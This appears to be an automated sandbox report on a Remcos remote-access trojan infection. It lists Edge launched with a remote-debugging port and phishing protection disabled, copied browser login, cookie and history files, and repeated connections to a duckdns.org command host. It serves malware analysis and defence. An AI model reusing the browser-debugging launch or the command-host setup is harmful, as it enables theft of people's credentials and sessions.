C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2188,15044855724024717936,7993560730592589782,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2188,15044855724024717936,7993560730592589782,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 ris4sts8yan0i.duckdns.org udp
DE 194.163.145.131:23458 ris4sts8yan0i.duckdns.org tcp
DE 194.163.145.131:23458 ris4sts8yan0i.duckdns.org tcp
DE 194.163.145.131:23458 ris4sts8yan0i.duckdns.org tcp
DE 194.163.145.131:23458 ris4sts8yan0i.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 131.145.163.194.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com tcp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 216.58.201.110:443 apis.google.com tcp
GB 142.250.180.10:443 ogads-pa.googleapis.com tcp
GB 142.250.180.10:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 10.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.16.238:443 play.google.com tcp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp

Files

memory/4904-4-0x00007FFC2E123000-0x00007FFC2E125000-memory.dmp

memory/4904-5-0x0000016A61300000-0x0000016A61322000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5zo4q0gx.o3y.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4904-15-0x00007FFC2E120000-0x00007FFC2EBE1000-memory.dmp

memory/4904-16-0x00007FFC2E120000-0x00007FFC2EBE1000-memory.dmp

memory/4904-19-0x00007FFC2E123000-0x00007FFC2E125000-memory.dmp

memory/4904-20-0x00007FFC2E120000-0x00007FFC2EBE1000-memory.dmp

memory/4904-21-0x00007FFC2E120000-0x00007FFC2EBE1000-memory.dmp

memory/4904-24-0x00007FFC2E120000-0x00007FFC2EBE1000-memory.dmp

memory/3960-25-0x0000000005320000-0x0000000005356000-memory.dmp

memory/3960-26-0x00000000059F0000-0x0000000006018000-memory.dmp

memory/3960-27-0x0000000006050000-0x0000000006072000-memory.dmp

memory/3960-29-0x0000000006160000-0x00000000061C6000-memory.dmp

memory/3960-28-0x00000000060F0000-0x0000000006156000-memory.dmp

memory/3960-35-0x0000000006290000-0x00000000065E4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d336b18e0e02e045650ac4f24c7ecaa7
SHA1 87ce962bb3aa89fc06d5eb54f1a225ae76225b1c
SHA256 87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27
SHA512 e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

memory/3960-41-0x00000000068D0000-0x00000000068EE000-memory.dmp

memory/3960-42-0x0000000006900000-0x000000000694C000-memory.dmp

memory/3960-43-0x0000000008130000-0x00000000087AA000-memory.dmp

memory/3960-44-0x0000000006E70000-0x0000000006E8A000-memory.dmp

memory/3960-45-0x0000000007B50000-0x0000000007BE6000-memory.dmp

memory/3960-46-0x0000000007AE0000-0x0000000007B02000-memory.dmp

memory/3960-47-0x0000000008D60000-0x0000000009304000-memory.dmp

C:\Users\Admin\AppData\Roaming\Avlshingstes2.Xyl

MD5 3ff0ded79e4674ee861175bbf1989217
SHA1 6f877e0832ee980138348a5f730586d7228d3213
SHA256 663243c6b32ec1822116cec4cd2859afbd0231e685e12b830ea8c2b06bc063d1
SHA512 49ebef4555879780d0f3ab84323af70c31ad9d8ac6d3851d3e3a6f15d216853dfd68ed563f04de850462af0bf43773b29217c92f36d461875d2983099b7b1caf

memory/3960-49-0x0000000009310000-0x000000000E48B000-memory.dmp

memory/3376-62-0x0000000000A80000-0x0000000001CD4000-memory.dmp

memory/3376-66-0x0000000000A80000-0x0000000001CD4000-memory.dmp

memory/3376-68-0x0000000022D60000-0x0000000022D94000-memory.dmp

memory/3376-71-0x0000000022D60000-0x0000000022D94000-memory.dmp

memory/3376-72-0x0000000022D60000-0x0000000022D94000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 040a23375149542d4fdcf8e23581dd8b
SHA1 5310ab8474a42a27455dbf7aa0557af3a3579528
SHA256 9511f54f574bd495574e6c203fd5c52d5200bd33201b938bb926f8ae15330f96
SHA512 1dd649b96f3f1721aa25537aedbd62041517cf16cebd0543274a1aa044eb6d86c05d5646f2d41818a46e54ed9cf60a0fefe0d9918e0fb64263439ee267d76a0e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 f21497c43aaeac34b774b5de599f0d7d
SHA1 958fd379a5ad6b9d142f8804cfa8bbb63ae8454f
SHA256 2774b0104751b5703109002ea568d0b0385a8e9566d0f4d7d704ebe82792bd7a
SHA512 364a81d4662c5a21c809ca8763a238d68c4834f09fd317fa51f589d471de056be5d84c449902220263bbc211567492ac99c6f67f6fc58d48425252861099cb68

\??\pipe\crashpad_4916_ZXLOMZDLCALWEYRX

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

MD5 282070157912b4b1097cfc23de08b809
SHA1 a2249fbb6d215d911d31f6ce1163efe2a29b0440
SHA256 8321edf19d04dee4b50cad0ce186907525174067edcff47f5be343426cb1fc8c
SHA512 b9dfd49a1e07680c7f169a5bd563a9939adb1a108bb4f06f18de2f1363daeb9b41878d48a455b3e948bef637a34131d2e1928eeb611077ffd1334c344e51a6b7

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

memory/1040-189-0x0000000000400000-0x0000000000462000-memory.dmp

memory/872-188-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4612-190-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1040-187-0x0000000000400000-0x0000000000462000-memory.dmp

memory/4612-183-0x0000000000400000-0x0000000000478000-memory.dmp

memory/872-182-0x0000000000400000-0x0000000000424000-memory.dmp

memory/872-186-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4612-185-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4612-180-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1040-181-0x0000000000400000-0x0000000000462000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/3376-212-0x00000000237A0000-0x00000000237B9000-memory.dmp

memory/3376-211-0x00000000237A0000-0x00000000237B9000-memory.dmp

memory/3376-208-0x00000000237A0000-0x00000000237B9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ipqrymijdbvsnektqezwbayftjyckmdnyw

MD5 bc25ccf39db8626dc249529bcc8c5639
SHA1 3e9cbdb20a0970a3c13719a2f289d210cdcc9e1d
SHA256 b333f8c736c701bc826886f395d928731850cbce6db77be752b3cf7979114904
SHA512 9a546127bddc1d187e674cda82e6c5046cac7f3e6f9515aed68d5bff2264b9d679d857dd97270e10826cd11ce2d92d82dd7f9801e19027e346b60bcc814cca1a

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 6c719379737d47a6d2c7bef6b0ef9112
SHA1 f5814fb4f4057166887a816d95f2d3c5980968d2
SHA256 d022df827d85e0ef6906796157df242c3ab4062aed2da537a84cd0c51352fb37
SHA512 26d6ec05f181f1b8fd645e228d36ee27be19a53b9af3aa3a8f3ba8d56105a6fe6de8f871034ab386aa00cfe369977e4d9f945a874ceba1cace4ee33c6348d8f3

memory/3376-230-0x0000000000A80000-0x0000000001CD4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 421a8192ab035ea9e0c382b884cd78b1
SHA1 11ab097c6b3b93bd707f32425a6f596a8c737042
SHA256 b9cb8ef94e430b0b22e232582b168555c5e522e933627da0142e311c96b3f421
SHA512 4d3d19fc4e2a9f242f660340c7a083a1f25467331711df598149a54216bcd85e5a56e9fd07b025ec89c013cdd61311ac570b69983e0fad36bdfffe61117c9a96

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 b6928e3173756e18875134dec49612e8
SHA1 9eae515d895715c6c50713c531e26a760cf277bd
SHA256 6dbac8c477e5466511b34df7d141e0a2e14e28ce31b434be3f2f46550172ff58
SHA512 1b83f3e36a17ebec8537fd753a275f5161a69f3c876c9f3c6a9d09780d15a2b005f732de687507a4c7fc6521851180fd21fbd928b88367b1ae6f6e93b2af5709

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 5c6672444389f41d039f5f41b96544e5
SHA1 34e69a7092611959dd0b18d5c6d1ec9cd80c3388
SHA256 4eb52caa6eaf83f793d13b9835ea56785a90ed85330d5d48a573b4d8b9ebc5c2
SHA512 1178ca689d6f169b8c62ca5b770fcdfc1a8a693d7fa195a5e6824c0686477158f6c62e198cb8af3fc64550c6d31449011cc8533fd1f16107a173b7b356bbb7aa

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

MD5 b40e1be3d7543b6678720c3aeaf3dec3
SHA1 7758593d371b07423ba7cb84f99ebe3416624f56
SHA256 2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4
SHA512 fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

MD5 8eb5c67a8ad0ed7ff5d300cb2b511ff8
SHA1 923e943936ead30232090a88ee71be21c9af2603
SHA256 7d64c57aba927d2ce0f185ec9a840fc4daf19bd92f4a4337b7659f3ffe3c2daf
SHA512 eb0d61061401fcdf77f7da99b2b2f3c566977c593593f895227aea6953dfda70abfce653b9d414e21c79dcb5b4fbe0a5e1cd485eccb7634be91eb7ac170f4340

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

MD5 90881c9c26f29fca29815a08ba858544
SHA1 06fee974987b91d82c2839a4bb12991fa99e1bdd
SHA256 a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a
SHA512 15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 29acadf6c131828ed5f97f890970c24c
SHA1 db336f9689942301a6b63f3e876aecfa40f221bb
SHA256 d3294eeccdb4824723fe997974656f42412304a7f4f3207f7a54253cc82fe1e9
SHA512 ba09cbe0a63e19a68b7dd711badcc5bc46ee84edc3788f63acfb3c83037ef3792726bbce95373c603f66902a363ef33a242b3ff45bdb4e47fe7d5e7d0b9d9986

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

MD5 19e215e9a81538e46a400189f4c870b6
SHA1 e7f012530c9b09edc9495823bbac5fc8ea650561
SHA256 fe7863acd8d76b3b2c4fa7d8c40e0307afa0624ddc2ceacd11e41294a84f2b19
SHA512 81af82a10e0453294968206ab13cf5dc9b523552a8be9579d54056816ac49108c42da0ffaf1ad3602e2a9004b09cc06c851aa06bef47f77882d0a305b8669ca8

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

MD5 3fd16b1a67ac39994646a3635e27c30e
SHA1 6aae4657f3fa0df5c3f6541ba7b4b7a36e258968
SHA256 43012bc068e0b0499a1cee7d31abc33a579b6e3bdbdbaca7878e4a08c13dc81e
SHA512 ca80f7f46b7ab0b6f5c7b36cd9cea3fb4d3ba4a824478e557779c25ef4dc6de4b7067280063ea5c3d265ae9c2938e3910571cbb10c6aecd898ce616d8a7ddda3

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

MD5 986962efd2be05909f2aaded39b753a6
SHA1 657924eda5b9473c70cc359d06b6ca731f6a1170
SHA256 d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889
SHA512 e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

MD5 148079685e25097536785f4536af014b
SHA1 c5ff5b1b69487a9dd4d244d11bbafa91708c1a41
SHA256 f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8
SHA512 c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

MD5 d2f65d61889c6f070ebaac6ef81dcd1a
SHA1 dd809f6e3d919cfef281ddc923930f0d38f67333
SHA256 7fb969c3f22955e0e673f7ccb296a4d231e58a42b9a0903e3d5b8685a81b88dc
SHA512 45fa2d33b0017cd61a346552c75acf318eeb4efeb68ca8394cd253fc0fa359c31c6b0cc8d5d328fbf93147dc8576c844b5dc4ef05eeec0c281a1fe131eb476fc

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

MD5 dfee8c8549f5b4dea8a26f662f859933
SHA1 50e387863c24175d8ca06ae06343889695593cd1
SHA256 5090766872c90657a57122cb64fa7657c9b0a31b5c358767f6e520be7d9a8c44
SHA512 78736970fae455e11aa3bb55ca973f198a8c7565ac7473f734ef1528c57ac199e69238b6f92e96ec3cd3e7b32dfc89a01eba76918fbd820dc142a4ea324c3941

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

MD5 de4a293f02c7cc9c2458d8e317d621ff
SHA1 c84cf6ac1b331f904d452ac44d573b1cc3036aed
SHA256 4a8b8035a8a5a619e874c4b11a5fb0c671e785ac7d5242fedec0e754bbe2d266
SHA512 af7ca52ccf8a45f05c5f22bc4356c4a3cfd2895a1331dbd702328dbed3fe500601ce25afcf441f42b2638e4ad85b176732545af4a775b8da23de7b7b6cc602d0

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

MD5 d30bfa66491904286f1907f46212dd72
SHA1 9f56e96a6da2294512897ea2ea76953a70012564
SHA256 25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907
SHA512 44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

MD5 b2347e6653f3ab6da1255a848f85a025
SHA1 7688b4ecc62a62f746a2ef28052203b73f05d16a
SHA256 1357ff2c71dd75bae01d301998d7519acbaccb18fb05981853a00ed8b17ec68d
SHA512 86ac0a47d3736ef7ab90004b2e0269a383c2532b39adf02094445f9b9893edc9ec48d6a07107d16b0ee7decb1b02abee6dd94f79811799cd7095cb3d8a87c418

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

MD5 9082ba76dad3cf4f527b8bb631ef4bb2
SHA1 4ab9c4a48c186b029d5f8ad4c3f53985499c21b0
SHA256 bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd
SHA512 621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

MD5 3a30970eb9d63597fe62d0c0fbc2e17e
SHA1 510a49dfff8d26f7fdcbc6204cf7234777ac43dc
SHA256 30238c025d4dab9096862efc01f3f61a3e8d55374dd1b526d0afdbfe91b9ed05
SHA512 2b23f61261518a623670d89db4157237eafe3d96b0a816ff4f68c9017cec751b01f78cb0dc0d9f443e82c2281e7527a5645d98eb4baa91264dc6269483ca6719

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

MD5 cce317c13506074adc624c4f8e0205ec
SHA1 262c4e50c3693720d0ba438b3f13fbd72ba0c09d
SHA256 018dd15d2a2106649237a3a7b3f623753600db3c9b0d750fada9901acd13b0eb
SHA512 024434ee53d4e70a2dc7fa62f01f82d5275a90eb628ba65a267a26d96653817c154de0582833cfa60ae8931c56b4c1b9c28c165919e428c17c7bdf3a8d242519

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

MD5 69449520fd9c139c534e2970342c6bd8
SHA1 230fe369a09def748f8cc23ad70fd19ed8d1b885
SHA256 3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277
SHA512 ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

MD5 1e4417a575beff129db52d7f15855afc
SHA1 128abb09fbbcc64ff40a85d0ee546e7d3450a3ed
SHA256 25193de4fa4e3b4f5d0d46dd99d60a64aa7edf54584dd16ba1871389de2da601
SHA512 88ef5806a9c45725cd38897f3f0f44a36235c8fb788f318bfe5b5e9f156ea7a23aaa890729427607502983d7d0aa32eed46f0f18ff22049c4a7f989e2658cc5c

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

MD5 b307675f8456a654b02485d4989d9c79
SHA1 474d007ef1a2f04b410085697b15c2dedf92a0e4
SHA256 a645e357d95ce8d0d80646ba36d14b54925cf765975824ab51da0a320b6249bf
SHA512 10a96861a9bc1f89957e357b092c9b6ffe1e3d5d6cc7cdc7b44bfd1076b73beea038fbc3d5b6020153de9f347f534196ba7a2a866fc3bc580af6d7576da28d26

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

MD5 738658b83476ed13dc9284045566f167
SHA1 cc62a35a302e4462c9e2e0a7175fcf432e1b6db2
SHA256 6ec31edc0e11231b9861ac587988b2a4ce14913923f6ee641dfbbeb12bf7e41a
SHA512 38122a4c2ed80a9fe3cbd29d8699ba45f9478b25ea8e767e39fbdd01b526c7a351762a47871e694d6967bb43aa5f7e1e649fae212a952302ebee013579ca6650

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

MD5 a25a92d81cb4a91a695d0f5d86b7732f
SHA1 fed5f3ff727b5f1f780ea8de7ac44fdee3eae9a7
SHA256 b8351065a7189f12e131e86a0f62a4ee2b96545c927492d1143d8b5b8d032a29
SHA512 a569a33e5216cbb4e52cdad8514f58ee65974c692a1b10e5138ffd45bdf858a8cd8ab7c21588582ec947777ff3ae871a83b68a9199acc038fb33ba9a767a8598

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

MD5 54754f80f77f5cc0e631c3c85dfa42fa
SHA1 ff45e894809ce4efd8f95b4ac05d3c1caa6f5f77
SHA256 0aa59da8499769a3a545d8bdb35273e55df7801d98b3fdd1e857cdb395a24bd1
SHA512 da9f192ca229e68a3a9dd3a323b3e914ace7fd64e0c53606bb3565b4ce1699a5b3514ea701f1010377837afae9376ebcb80a700406d0e9894e80ffec8af87dab

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

MD5 3dd46d87c924674eb0d124a4b124de4c
SHA1 331d4c34cd630a0b1b422c0d3708455367d59d99
SHA256 85cad85957220c0d6490e6aa825df7a863bea04940e9818530eaa038d9207bbf
SHA512 a7b5229ae9157bca066caea76af71a6573a3907a640213318ee53fbc06f8e700a55fb6b25b50f5fce023b705ca9ff5d5ccf435dd55cd3227dbdfcc84f51251f7

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

MD5 9a9111d525c5ebbe85589f953cd1cb88
SHA1 3bac95a4caaea30259afaa9067b53fcb3ebaecee
SHA256 8ccdd4ab8a41380440cae41bbe6ee5bf02e0e3754cbd2ba73a09f83ee17db4df
SHA512 4edf6b0357d3d832fbe05e38d6f27c34cdeda5e62968c53e62a438538d2bacb6d48c49fb2b59d361a08fd83460277ec423af909f77b741fe907f22f923ef61a7

memory/3376-361-0x0000000000A80000-0x0000000001CD4000-memory.dmp

C:\ProgramData\remcos\logs.dat

MD5 8e008f429d5dddb60eb390aa27918231
SHA1 37dab35f711f4d04e261802f3796e33cd7ae0402
SHA256 7d6a9586845e8c44c0bbd4bdb9cd0895a0578c52e76b6b5ef39b172145327973
